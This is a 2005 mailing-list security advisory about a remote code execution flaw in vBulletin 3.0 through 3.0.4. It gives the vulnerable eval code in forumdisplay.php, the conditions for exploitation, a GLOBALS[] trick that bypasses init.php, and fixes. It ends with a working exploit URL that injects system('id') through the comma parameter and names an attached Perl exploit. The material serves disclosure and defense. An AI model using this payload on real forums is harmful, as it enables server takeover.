Proof of concept On 13 Feb 2005 17:16:35 -0000, AL3NDALEEB <al3ndaleeb@xxxxxxx> wrote:
Vulnerable Systems: ---------------- vBulletin version 3.0 up to and including version 3.0.4 Immune systems: ---------------- vBulletin version 3.0.5 vBulletin version 3.0.6 Vulnerable code in forumdisplay.php : ############################################################# if ($vboptions['showforumusers']) { . . . . if ($bbuserinfo['userid']) { . . . . $comma = ', '; } . . . . while ($loggedin = $DB_site->fetch_array($forumusers)) { . . .eval('$activeusers .= "' . $comma . fetch_template('forumdisplay_loggedinuser') . '";'); <<==== (Vuln)$comma = ', '; . . } . . } ############################################################# Conditions: ----------------1st condition : $vboptions['showforumusers'] == True , the admin must setshowforumusers ON in vbulletin options.2nd condition : $bbuserinfo['userid'] == 0 , you must be an visitor/guest. 3rd condition : $DB_site->fetch_array($forumusers) == True , when you visit the forums, it must has at least one user show the forum. 4th condition : magic_quotes_gpc must be OFF SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in init.php by secret array GLOBALS[]=1 ;))) Solutions: ---------------- * Disable showforumusers in vbulletin options . * add the next line before if ($vboptions['showforumusers']) $comma = ''; Exploit: ---------------- example : http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
-- Using Opera's revolutionary e-mail client: http://www.opera.com/m2/
Attachment:
vbulletin304-xp.pl
Description: Binary data